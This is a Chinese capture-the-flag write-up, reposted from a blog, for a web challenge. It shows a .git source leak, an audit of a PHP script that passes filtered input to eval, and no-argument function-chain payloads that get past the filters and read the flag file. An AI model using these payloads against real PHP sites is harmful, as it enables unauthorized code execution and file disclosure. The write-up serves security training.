.git源码泄露+代码审计
转载大佬的WP
https://blog.csdn.net/weixin_43952190/article/details/107061554
1.打开网址只显示了flag在哪,查看源代码无任何有用信息
2.用御剑也没搜索到后台目录
3.这时候考虑源码泄露
打开网址
http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git
出现403错误
403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。
猜测也许是.git源码泄露,这时候就要用到GitHack.py
得到index.php源码,打开
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
ok,一步一步分析:
- 设置参数exp
- 过滤data,filter,php,phar伪协议
引用一下大佬的伪协议总结
https://blog.csdn.net/nzjdsds/article/details/82461043
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
在得到的exp参数中匹配 [a-z,_]+((?R)?) 并转化为空,注意这里有(?R)?递归调用限制我们传入的参数只能是无参数函数或者是套函数,就是说假如我们传入参数为exp=system('ls');
则匹配不成功,
假如我们传入exp=print_r(scandir(pos(localeconv())));
因为匹配成功所以函数localeconv(),pos(),scandir(),print_r()用NULL替换后为;
从而可以进入if从句。
(?R)?递归用法:
字符串 :abc123dsf654wre485wer652
传统作法:\w{3}\d{3}\w{3}\d{3}\w{3}\d{3}\w{3}\d{3}
递归做法:(\w{3}\d{3}|(?R))*
- 最后一个if从句过滤了et|na|info|dec|bin|hex|oct|pi|log
函数扩展:
scandir(’.’):扫描当前目录
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
pos(),current():返回数组第一个值
构造payload:
exp=print_r(scandir(pos(localeconv())));
数组操作函数:
end():数组指针指向最后一位
next(): 数组指针指向下一位
array_reverse(): 将数组颠倒
array_rand(): 随机返回数组的键名
array_flip():交换数组的键和值
读取文件函数
file_get_content() :因为et被ban,所以不能使用
readfile()
highlight_file()
show_source()
构造payload:
exp=show_source(next(array_reverse(scandir(pos(localeconv())))));//反转数组顺序读取第二个元素内容(这种方法只能读取第二个或倒数第二个)
exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));//随机返回数组的键名
得flag